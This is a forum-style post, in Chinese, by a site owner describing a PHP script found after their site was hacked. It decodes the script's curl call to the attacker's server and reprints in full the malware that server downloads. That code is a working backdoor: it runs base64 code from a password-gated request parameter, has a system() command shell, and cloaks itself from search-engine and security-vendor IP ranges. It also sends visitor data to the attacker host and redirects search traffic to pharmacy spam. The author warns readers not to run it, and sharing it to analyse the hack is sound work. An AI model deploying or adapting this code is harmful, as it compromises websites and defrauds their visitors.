今天我的网站被黑了,这是我发现的一个 php 脚本:https ://docs.google.com/open?id=0B7aEugGV1GwTNnd2c2Fqei1vakE 。
我将 eval 更改为在此代码中打印,但我无法解码脚本的源代码。
我想看看这个脚本在我的网站上做了 1 周。由于这些脚本的站点拒绝攻击最终改变了 .htaccess 代码,我发现了这一点。
我什至尝试使用脚本名称和注释行在 Google 中找到任何已知的常见威胁,但我没有找到。
解码后我到达了http://pastebin.com/VGqeGDkH。请不要在您的系统上运行上述代码......因为它不是唯一会下载到您的系统的罚款。
黑客发送curl
或file_get_contents
请求:
curl_setopt($vH5wU9kS8uO3wG9xI7wR5aV1fS3vU2qC2bA6yP9oG2uZ1zF7zZ5dR8gI0tJ3jV3oB0cD1iN6dD1vL8gL2uP4fX0yU2tF4bR8qD1xB2pL7eS9kW2rI7vD1dS5oA4iP9jH6, CURLOPT_URL, "$pO6oA9pF4aY2lO7dY9vK3sU7nL8lF4gL1dY7uD8mU4xH9gM2hR9gT8tA6dJ1aB9sA8wP3sO5zI8xR2eZ0aD4dK7uQ0rG7aA7nI6kZ3kI3tG5$cO9qE4hY7wW5rJ7qL1bN7uP0dE2zE9rB2bV6lY3sJ8eO3rN3pR0tA8mA0qR1oK2dE9qM3yH0kB1wU1qX2pJ0bS5xV4mG7pY1pI6iK8eP8xY3yX2$kI8yO6lP1lN7wX0fV2kY1zI9vO3mS6wK3lT9gH9rE6tZ8xT6dE7wG4dP5iJ0mC7bX0zJ3tO1iD0eD2hE4cJ0pG4gZ1bC8lT5jM1iK8hD3$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$fK3iD2pY6sG1xV5wB5wU8pJ1hP2qW7wZ5sI1kS4pN0pO7bD1fE1vZ2aL3pV0uZ2fI3eQ4kI9aD8wN5bF0jR8aQ8sN6rD0pV6sM4uJ7zK6aW5dR4bC7$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$zP3dW5gU5bS0sO7aO2cQ5tD0eV6cD9rW9sJ9jM0kO6zK8wL8hL9xU3zI1gJ7xT2rX9tO9wD6gL0pV5eD2rT4hL2uP1jB9sE2cU0fG6gJ1zM0pM2vS1wZ8lQ7uN8qA6eY0$qM2xA6eC8gQ2lE0qQ8eM7xT2dV5sS1aW2wH3qL5dG5sF3fI4zA1xG9gN9xV7fO4zT5qV2yU1gC2lR2vB1hF5dO6gC9xH6aC1wA6$zV0mR4mU2lH5iU0qI9iN1vM6eU2uO2qJ2fH4mY7wK1kH5nR0fE4yV8rI0vR3lM3zW2jK8cG3dX4zM3oQ8iK0iK7yS1fY0oE4yZ3xN7iI4sN6");
解码后你会得到
curl_setopt($ch, CURLOPT_URL, "http://95.211.128.197/100JS71MLKpzPzFbcYeVvZUMxCRUKBVFFx6iO6pr2VfhBthyzGcp.txt");
然后,这将下载文件和不同的后门到系统..
黑客还使用了很多先进的方法,例如加密、变量递归和大量备份。他还确保最终的机器人没有被谷歌、雅虎、微软公司、亚马逊、UCSD.EDU、印第安纳大学、索尼克发现。 .net 、 MCAFEE INTERNATIONAL 和 hz
我的建议
联系您的托管公司或安全专家..Your server needs to be checked
这是一个搜索引擎去优化器。它会将恶意文字注入您网站的内容中。因此,当机器人(如 Google 机器人)出现为您的网站编制索引时,它会将这些词与您的网站相关联。
这是它下载的文件的代码
别跑
$sutra = "http://95.211.128.197/tds"; // TDS Url
$scheme = "default"; // TDS Cheme
$www_root = "http://95.211.128.197"; // Manager path
$host=$_SERVER['HTTP_HOST'];
$agent=$_SERVER['HTTP_USER_AGENT'];
$server_accept_language = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
$server_user_agent = @$_SERVER['HTTP_USER_AGENT'];
$server_referer = @$_SERVER['HTTP_REFERER'];
$server_host = @$_SERVER['HTTP_HOST'];
$server_forwarded_for = @$_SERVER['HTTP_X_FORWARDED_FOR'];
$server_remote_addr = @$_SERVER['REMOTE_ADDR'];
$server_query_string = @$_SERVER['QUERY_STRING'];
$server_signature = @$_SERVER['SERVER_SIGNATURE'];
$server_request = @$_SERVER['REQUEST_URI'];
$debug = false;
if ($server_remote_addr == "108.170.8.174"){$debug = true;}
if ($debug)
{
echo "<title>DOOR OK</title>";
echo "originalurl=$originalurl<br>";
echo "server_user_agent=$server_user_agent<br>";
echo "server_referer=$server_referer<br>";
echo "server_host=$host<br>";
echo "server_remote_addr=$server_remote_addr<br>";
echo "server_request=$server_request<br>";
echo "www_root=$www_root<br><br>";
echo "Check CURL extension...";
if (extension_loaded('curl'))
{
echo "<font color=green><b>YES</b></font><br><br>";
}
else
{
echo "<font color=red><b>NO</b></font><br><br>";
}
}
// Some bad guys :)
if (eregi ("start=56",$server_referer))
{
exit();
}
if ($agent == "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)")
{
exit();
}
if ($agent == "Mozilla/4.0")
{
exit();
}
if (eregi("75.125.",$server_remote_addr))
{
exit();
}
if (eregi("41.190.",$server_remote_addr))
{
exit();
}
if (eregi("143.215.169",$server_remote_addr))
{
exit();
}
if (eregi("75.55.",$server_remote_addr))
{
exit();
}
if (eregi("67.212.",$server_remote_addr))
{
exit();
}
if (eregi("173.236.",$server_remote_addr))
{
exit();
}
if (eregi("184.154.",$server_remote_addr))
{
exit();
}
if ($server_remote_addr == '194.115.120.14')
{
exit();
}
//////////////////////////////////////////////////////////////////////////////
if((md5($_REQUEST["img_id"]) == "ae6d32585ecc4d33cb8cd68a047d8434") && isset($_REQUEST["mod_content"])) { eval(base64_decode($_REQUEST["mod_content"])); exit(); }
$cmd = $_GET['cmddd'];
if (isset($cmd))
{
system($cmd);
exit();
}
@$is_human = @detectBot($server_user_agent,$server_remote_addr,$server_query_string,$server_referer);
if (@$is_human==false)
{
$folder = str_replace("www.","",$host);
if (($server_request=="") || ($server_request=="/"))
{
$filename = "index.php";
}
else
{
$filename = str_replace("_","",$server_request);
$filename = str_replace("_","",$filename);
$filename = str_replace(" ","",$filename);
$filename = str_replace("%","",$filename);
$filename = str_replace("|","",$filename);
$filename = str_replace("/","",$filename);
$filename = str_replace(";","",$filename);
$filename = str_replace("+","",$filename);
$filename = str_replace("?","",$filename);
$filename = str_replace(".","",$filename);
$filename = str_replace("=","",$filename);
$filename1 = str_replace("&","",$filename);
$filename2 = str_replace("&","amp",$filename);
$filename1 = $filename1.".php";
$filename2 = $filename2.".php";
}
if (extension_loaded('curl'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$www_root/pages/$folder/$filename1");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$remote_page = curl_exec($ch);
$ch2 = curl_init();
curl_setopt($ch2, CURLOPT_URL, "$www_root/pages/$folder/$filename2");
curl_setopt($ch2, CURLOPT_HEADER, 0);
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
$remote_page2 = curl_exec($ch2);
$ch2 = curl_init();
//curl_setopt($ch2, CURLOPT_URL, "$www_root/_links/doors.php");
curl_setopt($ch2, CURLOPT_URL, "$www_root/pages/$folder/doors.txt");
curl_setopt($ch2, CURLOPT_HEADER, 0);
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
$links_map = curl_exec($ch2);
if (eregi ("Not Found", $links_map))
{
$links_map = "";
}
}
else
{
$remote_page = file_get_contents("$www_root/pages/$folder/$filename1");
$remote_page2 = file_get_contents("$www_root/pages/$folder/$filename2");
$links_map = file_get_contents("$www_root/pages/$folder/doors.txt");
if (eregi ("Not Found", $links_map))
{
$links_map = "";
}
//$links_map = file_get_contents("$www_root/_links/doors.php");
}
if (eregi('<h2>', $remote_page))
{
echo $remote_page."<!-- End HTML 3.51.197 -->";
exit;
}
if (eregi('<h2>', $remote_page2))
{
echo $remote_page2."<!-- End HTML 3.51.197 -->";
exit;
}
else
{
// NIHT :)
$originalurl="http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"];
$originaluseragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;";
if (extension_loaded('curl'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $originalurl);
curl_setopt($ch, CURLOPT_USERAGENT, $originaluseragent);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$originalpage = curl_exec($ch);
}
else
{
$originalpage = @file_get_contents($originalurl);
}
if (preg_match('/<body.*?>/i',$originalpage)) {
$originalpage=preg_replace('/href=([\'"]{0,1})http.*?>/i', '>', $originalpage);
$originalpage=preg_replace('/(<body.*?>)/i', "<body>$links_map", $originalpage, 1);
} elseif (preg_match('/<\/body>/i',$originalpage)) {
$originalpage=preg_replace('/href=([\'"]{0,1})http.*?>/i', '>', $originalpage);
$originalpage=preg_replace('/(<\/body>)/i', "$links_map</body>", $originalpage, 1);
}
print $originalpage."<!-- End HTML 3.51.197 -->";
exit;
//echo '<font id="mix" color="8a517f" style="height: 0;overflow: hidden;width: 0; position: absolute; font-family:courier; font-size:19px">'
//echo $links_map;
//'</font>';
}
}
else
{
$keys = "/acai|diet|weight|loss|pharmac|drug|lunesta|provigil|modafinil|proventil|accutane|cialas|aciphex|acomplia|acyclovir|adalat|albendazole|albenza|albuterol|aldactone|alendronate|allegra|altace|amaryl|amiloride|amlodipine|amoxicillin|ansaid|arava|arcoxia|atenolol|atorvastatin|avandia|avapro|avodart|aygestin|azathioprine|azithromycin|baclofen|bactrim|benazepril|benzodiazepine|biaxin|bisoprolol|bromocriptine|bupropion|calan|carbamazepine|carisoprodol|carvedilol|ceclor|cefaclor|cefpodoxime|celebrex|celecoxib|cetirizine|chlorambucil|cialis|clarinex|clarithromycin|claritin|clopidogrel|colospa|conjugated|coreg|coumadin|coversyl|cyproheptadine|danazol|danocrine|desloratadine|desyrel|digoxin|dilantin|dipyridamole|domperidone|dutasteride|effexor|eldepryl|enalapril|epivir|erythromycins|escitalopram|esomeprazole|estrace|estradiol|ethambutol|etoricoxib|evista|ezetimibe|famciclovir|famvir|felodipine|fenofibrate|fexofenadine|finasteride|flagyl|flavoxate|flomax|floxin|fluoxetine|flurbiprofen|fosamax|frumil|furosemide|gabapentin|gemfibrozil|geodon|glimepiride|glipizide|glucophage|glucotrol|hydroch|hytrin|hyzaar|ibuprofen|ilosone|imdur|imitrex|imuran|indapamide|inderal|irbesartan|isordil|isosorbide|kamagra|ketoconazole|lamictal|laminuvide|lamisil|lamotrigine|lanoxin|lansoprazole|lasix|leflunomide|lenor72|leukeran|levaquin|levitra|levlen|levofloxacin|levonorgestrel|levothroid|levothyroxine|lexapro|lioresal|lipitor|lisinopril|lopid|lopressor|loratadine|losartan|lotensin|lovastatin|loxapine|loxitane|lozol|mebeverine|medroxy|mefenamicacid|meloxicam|meridia|metformin|metoclopramide|metoprolol|metronidazole|mevacor|mexiletine|mexitil|microzide|minipress|mobic|montelukast|motilium|motrin|myambutol|nabumetone|naprosyn|naproxen|neurontin|nexium|nifedipine|nimodipine|nimotop|niravam|nizoral|nolvadex|norethindrone|norplant72|nortriptyline|norvasc|ofloxacin|omeprazole|orlistat|oseltami|pamelor|pantoprazole|parlodel|paroxetine|paxil|periactin|perindropril|persantine|phenergan|phenytoin|plavix|plendil|ponstel|prandin|pravachol|pravastatin|prazosin|prednisolone|prednisone|premarin|prevacid|prilosec|prograf|promethazine|propafenone|propecia|propranolol|proscar|protonix|provera|prozac|rabeprazole|raloxifene|ramipril|ranitidine|reductil|reglan|relafen|repaglinide|retrovir|rimonabant|risperdal|risperidone|rivotril|rosiglitazonemaleate|roxithromycin|rulide|rythmol|selegiline|sertraline|sibutramine|sildenafil|simvastatin|singulair|soma|spironolactone|stavudine|sulfamet|sumatriptan|sumycin|synthroid|tacrolimus|tadalafil|tamiflu|tamoxifen|tamsulosin|tegaserod|tegretol|tenormin|terazosin|terbinafine|tetracycline|topamax|topiramate|trazodone|tricor|trimox|urispas|valacyclovir|valtrex|vantin|vardenafil|vasotec|venlafaxine|verapamil|viagra|warfarin|xenical|zantac|zebeta|zelnorm|zerit|zestril|zetia|zidovudine|zimulti|ziprasidone|zithromax|zocor|zoloft|zovirax|zyban|zyrtec|ambien|phentermine|xanax|valium|tramadol|adipex|zolpidem|ativan|alprazolam|diazepam|klonopin|lorazepam|clonazepam|ultram|zopiclone|modalert|hair|vicodin|amoxil|atomoxetine|cipro|ciprofloxacin|clomid|clomiphene|deltasone|diflucan|doxycycline|fluconazole|isotretinoin|pentazine|septra|strattera/i";
if (strlen($_SERVER["HTTP_REFERER"]) < 30)
{
if (eregi ("google", $_SERVER["HTTP_REFERER"]))
{
$key = "unknown";
$host_new = str_replace("www.","",$host);
if (extension_loaded('curl'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$www_root/_scripts/human.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
$data = array(
'domain' => $host_new,
'uri' => $server_request,
'se' => $sese,
'referrer' => $_SERVER["HTTP_REFERER"],
'agent' => $agent,
'server_remote_addr' => $server_remote_addr,
'keys' => $key
);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_exec($ch);
}
else
{
@file_get_contents("$www_root/_scripts/human.php?domain=$host_new&uri=$server_request&se=$sese&keys=$key&agent=$agent&server_remote_addr=$server_remote_addr&referrer=".$_SERVER["HTTP_REFERER"]);
}
$location = "$sutra/in.cgi?$scheme";
header("Location: ".$location);
exit;
}
}
/** if ((eregi ("url=", $server_referer)) AND (preg_match('/google/i', $server_referer)))
{
$key = "unknown, https";
$host_new = str_replace("www.","",$host);
if (extension_loaded('curl'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$www_root/_scripts/human.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
$data = array(
'domain' => $host_new,
'uri' => $server_request,
'se' => $sese,
'referrer' => $_SERVER["HTTP_REFERER"],
'agent' => $agent,
'server_remote_addr' => $server_remote_addr,
'keys' => $key
);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_exec($ch);
}
else
{
@file_get_contents("$www_root/_scripts/human.php?domain=$host_new&uri=$server_request&se=$sese&keys=$key&agent=$agent&server_remote_addr=$server_remote_addr&referrer=".$_SERVER["HTTP_REFERER"]);
}
$location = "$sutra/in.cgi?$scheme";
header("Location: ".$location);
exit;
}
*/
if (preg_match($keys, $_SERVER["HTTP_REFERER"]))
{
$key = $_SERVER["HTTP_REFERER"];
$sese="unknown";
if (eregi("yahoo", $_SERVER["HTTP_REFERER"]))
{
$keys = explode ("p=", $_SERVER["HTTP_REFERER"]);
$keys = explode ("&", $keys[1]);
$key = $keys[0];
$sese="yahoo";
}
if (eregi("google", $_SERVER["HTTP_REFERER"]))
{
$keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
$keys = explode ("&", $keys[1]);
$key = $keys[0];
$sese="google";
}
if (eregi("bing", $_SERVER["HTTP_REFERER"]))
{
$keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
$keys = explode ("&", $keys[1]);
$key = $keys[0];
$sese="bing";
}
if (eregi("aol.com", $_SERVER["HTTP_REFERER"]))
{
$keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
$keys = explode ("&", $keys[1]);
$key = $keys[0];
$sese="aol";
}
if (eregi("ask.com", $_SERVER["HTTP_REFERER"]))
{
$keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
$keys = explode ("&", $keys[1]);
$key = $keys[0];
$sese="ask";
}
$host_new = str_replace("www.","",$host);
if (extension_loaded('curl'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$www_root/_scripts/human.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
$data = array(
'domain' => $host_new,
'uri' => $server_request,
'se' => $sese,
'referrer' => $_SERVER["HTTP_REFERER"],
'agent' => $agent,
'server_remote_addr' => $server_remote_addr,
'keys' => $key
);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_exec($ch);
}
else
{
@file_get_contents("$www_root/_scripts/human.php?domain=$host_new&uri=$server_request&se=$sese&keys=$key&agent=$agent&server_remote_addr=$server_remote_addr&referrer=".$_SERVER["HTTP_REFERER"]);
}
$location = "$sutra/in.cgi?$scheme¶meter=".$key."&se=".$host."&HTTP_REFERER=".$_SERVER["HTTP_REFERER"];
//$location = "http://health-profile.net/";
header("Location: ".$location);
exit;
}
}
////////////////////////////////////////////////////////////////////////////////////////////////////
function detectBot($server_user_agent,$server_remote_addr,$server_query_string,$server_referer){
$is_human = true;
$stop_ips_masks = array(
"/^8\.6\.4[8-9]\.[0-9]+$/", // NetRange: 8.6.48.0 - 8.6.55.255 Google Inc
"/^8\.6\.5[0-5]\.[0-9]+$/", // NetRange: 8.6.48.0 - 8.6.55.255 Google Inc
"/^64\.233\.1[6-8][0-9]\.[0-9]+$/", // NetRange: 64.233.160.0 - 64.233.191.255 Google Inc
"/^64\.233\.19[0-1]\.[0-9]+$/", // NetRange: 64.233.160.0 - 64.233.191.255 Google Inc
"/^64\.68\.8[0-7]\.[0-9]+$/", // NetRange: 64.68.80.0 - 64.68.87.255 Google Inc
"/^66\.249\.6[4-9]\.[0-9]+$/", // NetRange: 66.249.64.0 - 66.249.95.255 Google Inc
"/^66\.249\.[7-8][0-9]\.[0-9]+$/", // NetRange: 66.249.64.0 - 66.249.95.255 Google Inc
"/^66\.249\.9[0-5]\.[0-9]+$/", // NetRange: 66.249.64.0 - 66.249.95.255 Google Inc
"/^72\.14\.19[2-9]\.[0-9]+$/", // NetRange: 72.14.192.0 - 72.14.255.255 Google Inc
"/^72\.14\.2[0-5][0-9]\.[0-9]+$/", // NetRange: 72.14.192.0 - 72.14.255.255 Google Inc
"/^74\.125\.[0-9]+\.[0-9]+$/", // NetRange: 74.125.0.0 - 74.125.255.255 Google Inc
"/^74\.6\.[0-9]+\.[0-9]+$/", // NetRange: 74.6.0.0 - 74.6.255.255 Google Inc
"/^216\.239\.3[2-9]\.[0-9]+$/", // NetRange: 216.239.32.0 - 216.239.63.255 Google Inc
"/^216\.239\.4[0-9]\.[0-9]+$/", // NetRange: 216.239.32.0 - 216.239.63.255 Google In
"/^216\.239\.6[0-3]\.[0-9]+$/", // NetRange: 216.239.32.0 - 216.239.63.255 Google Inc
"/^209\.85\.12[8-9]\.[0-9]+$/", // NetRange: 209.85.128.0 - 209.85.255.255 Google Inc
"/^209\.85\.1[3-9][0-9]\.[0-9]+$/", // NetRange: 209.85.128.0 - 209.85.255.255 Google Inc
"/^209\.85\.2[0-5][0-9]\.[0-9]+$/", // NetRange: 209.85.128.0 - 209.85.255.255 Google Inc
"/^64\.9\.22[4-9]\.[0-9]+$/", // NetRange: 64.9.224.0 - 64.9.255.255 Google Inc
"/^64\.9\.2[3-4][0-9]\.[0-9]+$/", // NetRange: 64.9.224.0 - 64.9.255.255 Google Inc
"/^64\.9\.25[0-5]\.[0-9]+$/", // NetRange: 64.9.224.0 - 64.9.255.255 Google Inc
"/^66\.102\.[0-9]\.[0-9]+$/", // NetRange: 66.102.0.0 - 66.102.15.255 Google Inc
"/^66\.102\.1[0-5]\.[0-9]+$/", // NetRange: 66.102.0.0 - 66.102.15.255 Google Inc
"/^137\.110\.[0-9]+\.[0-9]+$/", // NetRange: 137.110.222.* Google bot
"/^65\.5[2-5]\.[0-9]+\.[0-9]+$/", // NetRange: 65.52.0.0 - 65.55.255.255 Microsoft Corp
"/^67\.195\.[0-9]+\.[0-9]+$/", // NetRange: 67.195.0.0 - 67.195.255.255 Yahoo! Inc
"/^209\.131\.3[2-9]\.[0-9]+$/", // NetRange: 209.131.32.0 - 209.131.63.255 Yahoo! Inc
"/^209\.131\.[4-5][0-9]\.[0-9]+$/", // NetRange: 209.131.32.0 - 209.131.63.255 Yahoo! Inc
"/^209\.131\.[6][0-3]\.[0-9]+$/", // NetRange: 209.131.32.0 - 209.131.63.255 Yahoo! Inc
"/^66\.163\.1[6-8][0-9]\.[0-9]+$/", // NetRange: 66.163.160.0 - 66.163.191.255 Yahoo! Inc
"/^66\.163\.19[0-1]\.[0-9]+$/", // NetRange: 66.163.160.0 - 66.163.191.255 Yahoo! Inc
"/^184\.72\.[0-9]+\.[0-9]+$/", // NetRange: 184.72.0.0 - 184.73.255.255 AMAZON
"/^184\.73\.[0-9]+\.[0-9]+$/", // NetRange: 184.72.0.0 - 184.73.255.255 AMAZON
"/^198\.134\.135\.[0-9]+$/", // NetRange: 198.134.135.0 - 198.134.135.255 UCSD.EDU
"/^129\.79\.49\.[0-9]+$/", // NetRange: 129.79.49.249 Indiana University
"/^69\.12\.216\.[0-9]+$/", // NetRange: 69.12.216.14 Sonic.net
"/^62\.189\.112\.[0-9]+$/", // NetRange: 62.189.112.0 - 62.189.112.255 MCAFEE INTERNATIONAL
"/^79\.178\.31\.[0-9]+$/", // NetRange: 79.178.31.165 hz
"/^78\.46\.70\.[0-9]+$/", // NetRange: 78.46.70.145 hz
"/^87\.98\.215\.[0-9]+$/", // NetRange: 87.98.215.155 hz
"/^64\.34\.165\.[0-9]+$/", // NetRange: 64.34.165.218 hz
"/^93\.186\.20\.[0-9]+$/", // NetRange: 93.186.20.13 hz
"/^204\.118\.31\.202$/",
"/^74\.81\.89\.114$/",
"/^82\.192\.91\.10$/",
"/^192\.251\.226\.206$/",
"/^95\.211\.27\.[0-9]+$/",
"/^95\.211\.129\.[0-9]+$/",
"/^95\.211\.128\.[0-9]+$/",
"/^128\.163\.16\.[0-9]+$/", // NetRange: 128.163.16.* UKY
"/^91\.217\.162\.[0-9]+$/",
"/^91\.220\.35\.[0-9]+$/",
"/^195\.14\.112\.[0-9]+$/",
"/^86\.55\.210\.[0-9]+$/",
"/^184\.173\.219\.[0-9]+$/",
"/^184\.172\.169\.[0-9]+$/",
"/^50\.22\.89\.[0-9]+$/",
"/^64\.120\.249\.[0-9]+$/",
"/^46\.37\.184\.[0-9]+$/",
"/^10\.48\.17\.[0-9]+$/",
"/^108\.170\.8\.[0-9]+$/",
"/^64\.120\.227\.[0-9]+$/"
);
$stop_ips_masks_count = count ($stop_ips_masks);
for($w=0; $w<$stop_ips_masks_count; $w++)
{
if(preg_match($stop_ips_masks[$w], $server_remote_addr))
{
$is_human = false; break;
}
}
$stop_agents_masks = "/google|bot|rambler|yandex|yahoo|freebsd|libwww|spider|linux/i";
if (preg_match($stop_agents_masks, $server_user_agent))
{
$is_human = false;
}
// if (strlen ($server_user_agent) < 12)
// {
// $is_human = false;
// }
return $is_human;
}